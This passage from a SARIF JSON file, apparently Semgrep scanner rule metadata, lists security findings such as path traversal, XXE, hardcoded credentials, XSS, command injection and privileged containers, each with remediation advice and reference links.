CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: go.lang.security.audit.net.use-tls.use-tls"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"The application builds a file path from potentially untrusted data, which can lead to a path traversal vulnerability. An attacker can manipulate the path which the application uses to access files. If the application does not validate user input and sanitize file paths, sensitive files such as configuration or user data can be accessed, potentially creating or overwriting files. In Flask apps, consider using the Werkzeug util `werkzeug.utils.secure_filename()` to sanitize paths and filenames."},"help":{"markdown":"The application builds a file path from potentially untrusted data, which can lead to a path traversal vulnerability. An attacker can manipulate the path which the application uses to access files. If the application does not validate user input and sanitize file paths, sensitive files such as configuration or user data can be accessed, potentially creating or overwriting files. In Flask apps, consider using the Werkzeug util `werkzeug.utils.secure_filename()` to sanitize paths and filenames.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.flask.file.tainted-path-traversal-stdlib-flask.tainted-path-traversal-stdlib-flask)\n - [https://flask.palletsprojects.com/en/2.3.x/patterns/fileuploads/](https://flask.palletsprojects.com/en/2.3.x/patterns/fileuploads/)\n - [https://owasp.org/Top10/A01_2021-Broken_Access_Control](https://owasp.org/Top10/A01_2021-Broken_Access_Control)\n - [https://owasp.org/www-community/attacks/Path_Traversal](https://owasp.org/www-community/attacks/Path_Traversal)\n - [https://portswigger.net/web-security/file-path-traversal](https://portswigger.net/web-security/file-path-traversal)\n - [https://werkzeug.palletsprojects.com/en/3.0.x/utils/#werkzeug.utils.secure_filename](https://werkzeug.palletsprojects.com/en/3.0.x/utils/#werkzeug.utils.secure_filename)\n","text":"The application builds a file path from potentially untrusted data, which can lead to a path traversal vulnerability. An attacker can manipulate the path which the application uses to access files. If the application does not validate user input and sanitize file paths, sensitive files such as configuration or user data can be accessed, potentially creating or overwriting files. In Flask apps, consider using the Werkzeug util `werkzeug.utils.secure_filename()` to sanitize paths and filenames."},"helpUri":"https://semgrep.dev/r/python.flask.file.tainted-path-traversal-stdlib-flask.tainted-path-traversal-stdlib-flask","id":"python.flask.file.tainted-path-traversal-stdlib-flask.tainted-path-traversal-stdlib-flask","name":"python.flask.file.tainted-path-traversal-stdlib-flask.tainted-path-traversal-stdlib-flask","properties":{"precision":"very-high","tags":["CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')","HIGH CONFIDENCE","OWASP-A01:2021 - Broken Access Control","OWASP-A05:2017 - Broken Access Control","security"]},"shortDescription":{"text":"Semgrep Finding: python.flask.file.tainted-path-traversal-stdlib-flask.tainted-path-traversal-stdlib-flask"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"The application is using an XML parser that has not been safely configured. This might lead to XML External Entity (XXE) vulnerabilities when parsing user-controlled input. An attacker can include document type definitions (DTDs) which can interact with internal or external hosts. XXE can lead to other vulnerabilities, such as Local File Inclusion (LFI), Remote Code Execution (RCE), and Server-side request forgery (SSRF), depending on the application configuration. An attacker can also use DTDs to expand recursively, leading to a Denial-of-Service (DoS) attack, also known as a `Billion Laughs Attack`. It is our recommendation to secure this parser against XXE attacks by configuring $FACTORY with `$FACTORY.setFeature(http://apache.org/xml/features/disallow-doctype-decl, true)`. Alternatively, the following configurations also provide protection against XXE attacks. `$FACTORY.setExpandEntityReferences(false)` `$FACTORY.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true)` `$FACTORY.setAttribute(XMLConstants.ACCESS_EXTERNAL_DTD, \"\")` `$FACTORY.setFeature(\"http://xml.org/sax/features/external-general-entities\", false)`. The best defense against XXE is to have an XML parser that supports disabling DTDs. Limiting the use of external entities from the start can prevent the parser from being used to process untrusted XML files. Reducing dependencies on external resources is also a good practice for performance reasons. It is difficult to guarantee that even a trusted XML file on your server or during transmission has not been tampered with by a malicious third-party. For more information, see: [Java XXE prevention](https://semgrep.dev/docs/cheat-sheets/java-xxe/)"},"help":{"markdown":"The application is using an XML parser that has not been safely configured. This might lead to XML External Entity (XXE) vulnerabilities when parsing user-controlled input. An attacker can include document type definitions (DTDs) which can interact with internal or external hosts. XXE can lead to other vulnerabilities, such as Local File Inclusion (LFI), Remote Code Execution (RCE), and Server-side request forgery (SSRF), depending on the application configuration. An attacker can also use DTDs to expand recursively, leading to a Denial-of-Service (DoS) attack, also known as a `Billion Laughs Attack`. It is our recommendation to secure this parser against XXE attacks by configuring $FACTORY with `$FACTORY.setFeature(http://apache.org/xml/features/disallow-doctype-decl, true)`. Alternatively, the following configurations also provide protection against XXE attacks. `$FACTORY.setExpandEntityReferences(false)` `$FACTORY.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true)` `$FACTORY.setAttribute(XMLConstants.ACCESS_EXTERNAL_DTD, \"\")` `$FACTORY.setFeature(\"http://xml.org/sax/features/external-general-entities\", false)`. The best defense against XXE is to have an XML parser that supports disabling DTDs. Limiting the use of external entities from the start can prevent the parser from being used to process untrusted XML files. Reducing dependencies on external resources is also a good practice for performance reasons. It is difficult to guarantee that even a trusted XML file on your server or during transmission has not been tampered with by a malicious third-party. For more information, see: [Java XXE prevention](https://semgrep.dev/docs/cheat-sheets/java-xxe/)\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/kotlin.xxe.documentbuilderfactory-xxe.documentbuilderfactory-xxe)\n - [https://blog.sonarsource.com/secure-xml-processor/](https://blog.sonarsource.com/secure-xml-processor/)\n - [https://blog.sonarsource.com/understanding-xxe-vulnerabilities/](https://blog.sonarsource.com/understanding-xxe-vulnerabilities/)\n - [https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html)\n - [https://cwe.mitre.org/data/definitions/776.html](https://cwe.mitre.org/data/definitions/776.html)\n - [https://docs.oracle.com/en/java/javase/13/security/java-api-xml-processing-jaxp-security-guide.html#GUID-D97A1F1D-8DDF-4D19-A7E5-99099F27346E](https://docs.oracle.com/en/java/javase/13/security/java-api-xml-processing-jaxp-security-guide.html#GUID-D97A1F1D-8DDF-4D19-A7E5-99099F27346E)\n - [https://github.com/returntocorp/java-xxe-research](https://github.com/returntocorp/java-xxe-research)\n - [https://owasp.org/Top10/A05_2021-Security_Misconfiguration](https://owasp.org/Top10/A05_2021-Security_Misconfiguration)\n - [https://rules.sonarsource.com/java/type/Vulnerability/RSPEC-2755](https://rules.sonarsource.com/java/type/Vulnerability/RSPEC-2755)\n - [https://semgrep.dev/blog/2022/xml-security-in-java](https://semgrep.dev/blog/2022/xml-security-in-java)\n - [https://semgrep.dev/docs/cheat-sheets/java-xxe/](https://semgrep.dev/docs/cheat-sheets/java-xxe/)\n","text":"The application is using an XML parser that has not been safely configured. This might lead to XML External Entity (XXE) vulnerabilities when parsing user-controlled input. An attacker can include document type definitions (DTDs) which can interact with internal or external hosts. XXE can lead to other vulnerabilities, such as Local File Inclusion (LFI), Remote Code Execution (RCE), and Server-side request forgery (SSRF), depending on the application configuration. An attacker can also use DTDs to expand recursively, leading to a Denial-of-Service (DoS) attack, also known as a `Billion Laughs Attack`. It is our recommendation to secure this parser against XXE attacks by configuring $FACTORY with `$FACTORY.setFeature(http://apache.org/xml/features/disallow-doctype-decl, true)`. Alternatively, the following configurations also provide protection against XXE attacks. `$FACTORY.setExpandEntityReferences(false)` `$FACTORY.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true)` `$FACTORY.setAttribute(XMLConstants.ACCESS_EXTERNAL_DTD, \"\")` `$FACTORY.setFeature(\"http://xml.org/sax/features/external-general-entities\", false)`. The best defense against XXE is to have an XML parser that supports disabling DTDs. Limiting the use of external entities from the start can prevent the parser from being used to process untrusted XML files. Reducing dependencies on external resources is also a good practice for performance reasons. It is difficult to guarantee that even a trusted XML file on your server or during transmission has not been tampered with by a malicious third-party. For more information, see: [Java XXE prevention](https://semgrep.dev/docs/cheat-sheets/java-xxe/)"},"helpUri":"https://semgrep.dev/r/kotlin.xxe.documentbuilderfactory-xxe.documentbuilderfactory-xxe","id":"kotlin.xxe.documentbuilderfactory-xxe.documentbuilderfactory-xxe","name":"kotlin.xxe.documentbuilderfactory-xxe.documentbuilderfactory-xxe","properties":{"precision":"very-high","tags":["CWE-776: Improper Restriction of Recursive Entity References in DTDs ('XML Entity Expansion')","MEDIUM CONFIDENCE","OWASP-A04:2017 - XML External Entities (XXE)","OWASP-A05:2021 - Security Misconfiguration","security"]},"shortDescription":{"text":"Semgrep Finding: kotlin.xxe.documentbuilderfactory-xxe.documentbuilderfactory-xxe"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"MemoryMarshal.CreateSpan and MemoryMarshal.CreateReadOnlySpan should be used with caution, as the length argument is not checked."},"help":{"markdown":"MemoryMarshal.CreateSpan and MemoryMarshal.CreateReadOnlySpan should be used with caution, as the length argument is not checked.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/csharp.lang.security.memory.memory-marshal-create-span.memory-marshal-create-span)\n - [https://docs.microsoft.com/en-us/dotnet/api/system.runtime.interopservices.memorymarshal.createspan?view=net-6.0](https://docs.microsoft.com/en-us/dotnet/api/system.runtime.interopservices.memorymarshal.createspan?view=net-6.0)\n - [https://docs.microsoft.com/en-us/dotnet/api/system.runtime.interopservices.memorymarshal.createreadonlyspan?view=net-6.0](https://docs.microsoft.com/en-us/dotnet/api/system.runtime.interopservices.memorymarshal.createreadonlyspan?view=net-6.0)\n","text":"MemoryMarshal.CreateSpan and MemoryMarshal.CreateReadOnlySpan should be used with caution, as the length argument is not checked."},"helpUri":"https://semgrep.dev/r/csharp.lang.security.memory.memory-marshal-create-span.memory-marshal-create-span","id":"csharp.lang.security.memory.memory-marshal-create-span.memory-marshal-create-span","name":"csharp.lang.security.memory.memory-marshal-create-span.memory-marshal-create-span","properties":{"precision":"very-high","tags":["CWE-125: Out-of-bounds Read","LOW CONFIDENCE","OWASP-A04:2021 - Insecure Design","security"]},"shortDescription":{"text":"Semgrep Finding: csharp.lang.security.memory.memory-marshal-create-span.memory-marshal-create-span"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"The application uses an empty credential. This can lead to unauthorized access by either an internal or external malicious actor. It is recommended to rotate the secret and retrieve them from a secure secret vault or Hardware Security Module (HSM), alternatively environment variables can be used if allowed by your company policy."},"help":{"markdown":"The application uses an empty credential. This can lead to unauthorized access by either an internal or external malicious actor. It is recommended to rotate the secret and retrieve them from a secure secret vault or Hardware Security Module (HSM), alternatively environment variables can be used if allowed by your company policy.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/rust.secrets.postgres.hardcoded-connection-empty-password.hardcoded-connection-empty-password)\n - [https://docs.rs/postgres/latest/postgres/](https://docs.rs/postgres/latest/postgres/)\n - [https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures](https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures)\n","text":"The application uses an empty credential. This can lead to unauthorized access by either an internal or external malicious actor. It is recommended to rotate the secret and retrieve them from a secure secret vault or Hardware Security Module (HSM), alternatively environment variables can be used if allowed by your company policy."},"helpUri":"https://semgrep.dev/r/rust.secrets.postgres.hardcoded-connection-empty-password.hardcoded-connection-empty-password","id":"rust.secrets.postgres.hardcoded-connection-empty-password.hardcoded-connection-empty-password","name":"rust.secrets.postgres.hardcoded-connection-empty-password.hardcoded-connection-empty-password","properties":{"precision":"very-high","tags":["CWE-287: Improper Authentication","HIGH CONFIDENCE","OWASP-A02:2017 - Broken Authentication","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: rust.secrets.postgres.hardcoded-connection-empty-password.hardcoded-connection-empty-password"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Detected a template variable used in a script tag. Although template variables are HTML escaped, HTML escaping does not always prevent cross-site scripting (XSS) attacks when used directly in JavaScript. If you need to do this, use `escape_javascript` or its alias, `j`. However, this will not protect from XSS in all circumstances; see the references for more information. Consider placing this value in the HTML portion (outside of a script tag)."},"help":{"markdown":"Detected a template variable used in a script tag. Although template variables are HTML escaped, HTML escaping does not always prevent cross-site scripting (XSS) attacks when used directly in JavaScript. If you need to do this, use `escape_javascript` or its alias, `j`. However, this will not protect from XSS in all circumstances; see the references for more information. Consider placing this value in the HTML portion (outside of a script tag).\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/ruby.rails.security.audit.xss.templates.var-in-script-tag.var-in-script-tag)\n - [https://www.netsparker.com/blog/web-security/preventing-xss-ruby-on-rails-web-applications/](https://www.netsparker.com/blog/web-security/preventing-xss-ruby-on-rails-web-applications/)\n - [https://www.youtube.com/watch?v=yYTkLUEdIyE](https://www.youtube.com/watch?v=yYTkLUEdIyE)\n - [https://www.veracode.com/blog/secure-development/nodejs-template-engines-why-default-encoders-are-not-enough](https://www.veracode.com/blog/secure-development/nodejs-template-engines-why-default-encoders-are-not-enough)\n","text":"Detected a template variable used in a script tag. Although template variables are HTML escaped, HTML escaping does not always prevent cross-site scripting (XSS) attacks when used directly in JavaScript. If you need to do this, use `escape_javascript` or its alias, `j`. However, this will not protect from XSS in all circumstances; see the references for more information. Consider placing this value in the HTML portion (outside of a script tag)."},"helpUri":"https://semgrep.dev/r/ruby.rails.security.audit.xss.templates.var-in-script-tag.var-in-script-tag","id":"ruby.rails.security.audit.xss.templates.var-in-script-tag.var-in-script-tag","name":"ruby.rails.security.audit.xss.templates.var-in-script-tag.var-in-script-tag","properties":{"precision":"very-high","tags":["CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","LOW CONFIDENCE","OWASP-A03:2021 - Injection","OWASP-A07:2017 - Cross-Site Scripting (XSS)","security"]},"shortDescription":{"text":"Semgrep Finding: ruby.rails.security.audit.xss.templates.var-in-script-tag.var-in-script-tag"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Untrusted input might be injected into a command executed by the application, which can lead to a command injection vulnerability. An attacker can execute arbitrary commands, potentially gaining complete control of the system. To prevent this vulnerability, avoid executing OS commands with user input. If this is unavoidable, validate and sanitize the input, and use safe methods for executing the commands."},"help":{"markdown":"Untrusted input might be injected into a command executed by the application, which can lead to a command injection vulnerability. An attacker can execute arbitrary commands, potentially gaining complete control of the system. To prevent this vulnerability, avoid executing OS commands with user input. If this is unavoidable, validate and sanitize the input, and use safe methods for executing the commands.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.cherrypy.os.tainted-os-command-stdlib-cherrypy.tainted-os-command-stdlib-cherrypy)\n - [https://docs.cherrypy.dev/en/latest/tutorials.html](https://docs.cherrypy.dev/en/latest/tutorials.html)\n - [https://docs.python.org/3/library/os.html](https://docs.python.org/3/library/os.html)\n - [https://docs.python.org/3/library/subprocess.html#subprocess.Popen](https://docs.python.org/3/library/subprocess.html#subprocess.Popen)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n - [https://semgrep.dev/docs/cheat-sheets/python-command-injection/](https://semgrep.dev/docs/cheat-sheets/python-command-injection/)\n - [https://stackless.readthedocs.io/en/v2.7.16-slp/library/commands.html](https://stackless.readthedocs.io/en/v2.7.16-slp/library/commands.html)\n","text":"Untrusted input might be injected into a command executed by the application, which can lead to a command injection vulnerability. An attacker can execute arbitrary commands, potentially gaining complete control of the system. To prevent this vulnerability, avoid executing OS commands with user input. If this is unavoidable, validate and sanitize the input, and use safe methods for executing the commands."},"helpUri":"https://semgrep.dev/r/python.cherrypy.os.tainted-os-command-stdlib-cherrypy.tainted-os-command-stdlib-cherrypy","id":"python.cherrypy.os.tainted-os-command-stdlib-cherrypy.tainted-os-command-stdlib-cherrypy","name":"python.cherrypy.os.tainted-os-command-stdlib-cherrypy.tainted-os-command-stdlib-cherrypy","properties":{"precision":"very-high","tags":["CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')","HIGH CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: python.cherrypy.os.tainted-os-command-stdlib-cherrypy.tainted-os-command-stdlib-cherrypy"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"OWASP guidance recommends disabling tracing for production applications to prevent accidental leakage of sensitive application information."},"help":{"markdown":"OWASP guidance recommends disabling tracing for production applications to prevent accidental leakage of sensitive application information.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/csharp.dotnet.security.net-webconfig-trace-enabled.net-webconfig-trace-enabled)\n - [https://cheatsheetseries.owasp.org/cheatsheets/DotNet_Security_Cheat_Sheet.html#asp-net-web-forms-guidance](https://cheatsheetseries.owasp.org/cheatsheets/DotNet_Security_Cheat_Sheet.html#asp-net-web-forms-guidance)\n - [https://msdn.microsoft.com/en-us/library/e8z01xdh.aspx](https://msdn.microsoft.com/en-us/library/e8z01xdh.aspx)\n","text":"OWASP guidance recommends disabling tracing for production applications to prevent accidental leakage of sensitive application information."},"helpUri":"https://semgrep.dev/r/csharp.dotnet.security.net-webconfig-trace-enabled.net-webconfig-trace-enabled","id":"csharp.dotnet.security.net-webconfig-trace-enabled.net-webconfig-trace-enabled","name":"csharp.dotnet.security.net-webconfig-trace-enabled.net-webconfig-trace-enabled","properties":{"precision":"very-high","tags":["CWE-1323: Improper Management of Sensitive Trace Data","LOW CONFIDENCE","OWASP-A05:2021 - Security Misconfiguration","security"]},"shortDescription":{"text":"Semgrep Finding: csharp.dotnet.security.net-webconfig-trace-enabled.net-webconfig-trace-enabled"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Heroku API Key detected"},"help":{"markdown":"Heroku API Key detected\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/generic.secrets.security.detected-heroku-api-key.detected-heroku-api-key)\n - [https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures](https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures)\n","text":"Heroku API Key detected"},"helpUri":"https://semgrep.dev/r/generic.secrets.security.detected-heroku-api-key.detected-heroku-api-key","id":"generic.secrets.security.detected-heroku-api-key.detected-heroku-api-key","name":"generic.secrets.security.detected-heroku-api-key.detected-heroku-api-key","properties":{"precision":"very-high","tags":["CWE-798: Use of Hard-coded Credentials","LOW CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: generic.secrets.security.detected-heroku-api-key.detected-heroku-api-key"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Detected user input flowing into an HTML response. You may be accidentally bypassing secure methods of rendering HTML by manually constructing HTML and this could create a cross-site scripting vulnerability, which could let attackers steal sensitive user data."},"help":{"markdown":"Detected user input flowing into an HTML response. You may be accidentally bypassing secure methods of rendering HTML by manually constructing HTML and this could create a cross-site scripting vulnerability, which could let attackers steal sensitive user data.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.aws-lambda.security.tainted-html-response.tainted-html-response)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n","text":"Detected user input flowing into an HTML response. You may be accidentally bypassing secure methods of rendering HTML by manually constructing HTML and this could create a cross-site scripting vulnerability, which could let attackers steal sensitive user data."},"helpUri":"https://semgrep.dev/r/python.aws-lambda.security.tainted-html-response.tainted-html-response","id":"python.aws-lambda.security.tainted-html-response.tainted-html-response","name":"python.aws-lambda.security.tainted-html-response.tainted-html-response","properties":{"precision":"very-high","tags":["CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","MEDIUM CONFIDENCE","OWASP-A03:2021 - Injection","OWASP-A07:2017 - Cross-Site Scripting (XSS)","security"]},"shortDescription":{"text":"Semgrep Finding: python.aws-lambda.security.tainted-html-response.tainted-html-response"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"The application uses an empty credential. This can lead to unauthorized access by either an internal or external malicious actor. It is recommended to rotate the secret and retrieve them from a secure secret vault or Hardware Security Module (HSM), alternatively environment variables can be used if allowed by your company policy."},"help":{"markdown":"The application uses an empty credential. This can lead to unauthorized access by either an internal or external malicious actor. It is recommended to rotate the secret and retrieve them from a secure secret vault or Hardware Security Module (HSM), alternatively environment variables can be used if allowed by your company policy.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/kotlin.sql.drivermanager-hardcoded-empty-secret.drivermanager-hardcoded-empty-secret)\n - [https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures](https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures)\n","text":"The application uses an empty credential. This can lead to unauthorized access by either an internal or external malicious actor. It is recommended to rotate the secret and retrieve them from a secure secret vault or Hardware Security Module (HSM), alternatively environment variables can be used if allowed by your company policy."},"helpUri":"https://semgrep.dev/r/kotlin.sql.drivermanager-hardcoded-empty-secret.drivermanager-hardcoded-empty-secret","id":"kotlin.sql.drivermanager-hardcoded-empty-secret.drivermanager-hardcoded-empty-secret","name":"kotlin.sql.drivermanager-hardcoded-empty-secret.drivermanager-hardcoded-empty-secret","properties":{"precision":"very-high","tags":["CWE-287: Improper Authentication","HIGH CONFIDENCE","OWASP-A02:2017 - Broken Authentication","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: kotlin.sql.drivermanager-hardcoded-empty-secret.drivermanager-hardcoded-empty-secret"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. It is recommended to rotate the secret and retrieve them from a secure secret vault or Hardware Security Module (HSM), alternatively environment variables can be used if allowed by your company policy."},"help":{"markdown":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. It is recommended to rotate the secret and retrieve them from a secure secret vault or Hardware Security Module (HSM), alternatively environment variables can be used if allowed by your company policy.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/kotlin.mongo.mongo-hardcoded-secret.mongo-hardcoded-secret)\n - [https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures](https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures)\n","text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. It is recommended to rotate the secret and retrieve them from a secure secret vault or Hardware Security Module (HSM), alternatively environment variables can be used if allowed by your company policy."},"helpUri":"https://semgrep.dev/r/kotlin.mongo.mongo-hardcoded-secret.mongo-hardcoded-secret","id":"kotlin.mongo.mongo-hardcoded-secret.mongo-hardcoded-secret","name":"kotlin.mongo.mongo-hardcoded-secret.mongo-hardcoded-secret","properties":{"precision":"very-high","tags":["CWE-798: Use of Hard-coded Credentials","HIGH CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: kotlin.mongo.mongo-hardcoded-secret.mongo-hardcoded-secret"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"The application might dynamically evaluate untrusted input, which can lead to a code injection vulnerability. An attacker can execute arbitrary code, potentially gaining complete control of the system. To prevent this vulnerability, avoid executing code containing user input. If this is unavoidable, validate and sanitize the input, and use safe alternatives for evaluating user input."},"help":{"markdown":"The application might dynamically evaluate untrusted input, which can lead to a code injection vulnerability. An attacker can execute arbitrary code, potentially gaining complete control of the system. To prevent this vulnerability, avoid executing code containing user input. If this is unavoidable, validate and sanitize the input, and use safe alternatives for evaluating user input.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.express.code.vm2-express.vm2-express)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n","text":"The application might dynamically evaluate untrusted input, which can lead to a code injection vulnerability. An attacker can execute arbitrary code, potentially gaining complete control of the system. To prevent this vulnerability, avoid executing code containing user input. If this is unavoidable, validate and sanitize the input, and use safe alternatives for evaluating user input."},"helpUri":"https://semgrep.dev/r/javascript.express.code.vm2-express.vm2-express","id":"javascript.express.code.vm2-express.vm2-express","name":"javascript.express.code.vm2-express.vm2-express","properties":{"precision":"very-high","tags":["CWE-94: Improper Control of Generation of Code ('Code Injection')","HIGH CONFIDENCE","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.express.code.vm2-express.vm2-express"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"When using `System.Text.RegularExpressions` to process untrusted input, pass a timeout. A malicious user can provide input to `RegularExpressions` that abuses the backtracking behaviour of this regular expression engine. This will lead to excessive CPU usage, causing a Denial-of-Service attack"},"help":{"markdown":"When using `System.Text.RegularExpressions` to process untrusted input, pass a timeout. A malicious user can provide input to `RegularExpressions` that abuses the backtracking behaviour of this regular expression engine. This will lead to excessive CPU usage, causing a Denial-of-Service attack\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/csharp.lang.security.regular-expression-dos.regular-expression-dos.regular-expression-dos)\n - [https://owasp.org/www-community/attacks/Regular_expression_Denial_of_Service_-_ReDoS](https://owasp.org/www-community/attacks/Regular_expression_Denial_of_Service_-_ReDoS)\n - [https://docs.microsoft.com/en-us/dotnet/standard/base-types/regular-expressions#regular-expression-examples](https://docs.microsoft.com/en-us/dotnet/standard/base-types/regular-expressions#regular-expression-examples)\n","text":"When using `System.Text.RegularExpressions` to process untrusted input, pass a timeout. A malicious user can provide input to `RegularExpressions` that abuses the backtracking behaviour of this regular expression engine. This will lead to excessive CPU usage, causing a Denial-of-Service attack"},"helpUri":"https://semgrep.dev/r/csharp.lang.security.regular-expression-dos.regular-expression-dos.regular-expression-dos","id":"csharp.lang.security.regular-expression-dos.regular-expression-dos.regular-expression-dos","name":"csharp.lang.security.regular-expression-dos.regular-expression-dos.regular-expression-dos","properties":{"precision":"very-high","tags":["CWE-1333: Inefficient Regular Expression Complexity","MEDIUM CONFIDENCE","OWASP-A01:2017 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: csharp.lang.security.regular-expression-dos.regular-expression-dos.regular-expression-dos"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Hardcoded salt is used in cryptographic operations, which can result in major security issues. Use salt generator that is provided by bcrypt - `bcrypt.gensalt()`."},"help":{"markdown":"Hardcoded salt is used in cryptographic operations, which can result in major security issues. Use salt generator that is provided by bcrypt - `bcrypt.gensalt()`.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.bcrypt.bcrypt-hardcoded-salt.bcrypt-hardcoded-salt)\n - [https://cryptography.io/en/latest/random-numbers/#random-number-generation](https://cryptography.io/en/latest/random-numbers/#random-number-generation)\n - [https://owasp.org/Top10/A02_2021-Cryptographic_Failures](https://owasp.org/Top10/A02_2021-Cryptographic_Failures)\n","text":"Hardcoded salt is used in cryptographic operations, which can result in major security issues. Use salt generator that is provided by bcrypt - `bcrypt.gensalt()`."},"helpUri":"https://semgrep.dev/r/python.bcrypt.bcrypt-hardcoded-salt.bcrypt-hardcoded-salt","id":"python.bcrypt.bcrypt-hardcoded-salt.bcrypt-hardcoded-salt","name":"python.bcrypt.bcrypt-hardcoded-salt.bcrypt-hardcoded-salt","properties":{"precision":"very-high","tags":["CWE-327: Use of a Broken or Risky Cryptographic Algorithm","HIGH CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: python.bcrypt.bcrypt-hardcoded-salt.bcrypt-hardcoded-salt"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Service '$SERVICE' is running in privileged mode. This grants the container the equivalent of root capabilities on the host machine. This can lead to container escapes, privilege escalation, and other security concerns. Remove the 'privileged' key to disable this capability."},"help":{"markdown":"Service '$SERVICE' is running in privileged mode. This grants the container the equivalent of root capabilities on the host machine. This can lead to container escapes, privilege escalation, and other security concerns. Remove the 'privileged' key to disable this capability.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/yaml.docker-compose.security.privileged-service.privileged-service)\n - [https://www.trendmicro.com/en_us/research/19/l/why-running-a-privileged-container-in-docker-is-a-bad-idea.html](https://www.trendmicro.com/en_us/research/19/l/why-running-a-privileged-container-in-docker-is-a-bad-idea.html)\n - [https://containerjournal.com/topics/container-security/why-running-a-privileged-container-is-not-a-good-idea/](https://containerjournal.com/topics/container-security/why-running-a-privileged-container-is-not-a-good-idea/)\n","text":"Service '$SERVICE' is running in privileged mode. This grants the container the equivalent of root capabilities on the host machine. This can lead to container escapes, privilege escalation, and other security concerns. Remove the 'privileged' key to disable this capability."},"helpUri":"https://semgrep.dev/r/yaml.docker-compose.security.privileged-service.privileged-service","id":"yaml.docker-compose.security.privileged-service.privileged-service","name":"yaml.docker-compose.security.privileged-service.privileged-service","properties":{"precision":"very-high","tags":["CWE-250: Execution with Unnecessary Privileges","HIGH CONFIDENCE","OWASP-A05:2021 - Security Misconfiguration","OWASP-A06:2017 - Security Misconfiguration","security"]},"shortDescription":{"text":"Semgrep Finding: yaml.docker-compose.security.privileged-service.privileged-service"}},{"defaultConfiguration":{"level":"note"},"fullDescription":{"text":"Detected a cookie options with the `SameSite` flag set to \"None\". This is a potential security risk that arises from the way web browsers manage cookies. In a typical web application, cookies are used to store and transmit session-related data between a client and a server. To enhance security, cookies can be marked with the \"SameSite\" attribute, which restricts their usage based on the origin of the page that set them. This attribute can have three values: \"Strict,\" \"Lax,\" or \"None\". Make sure the `SameSite` attribute of the important cookies (e.g., session cookie) is set to a reasonable value. When `SameSite` is set to \"Strict\", no 3rd party cookie will be sent with outgoing requests, this is the most secure and private setting but harder to deploy with good usability. Setting it to 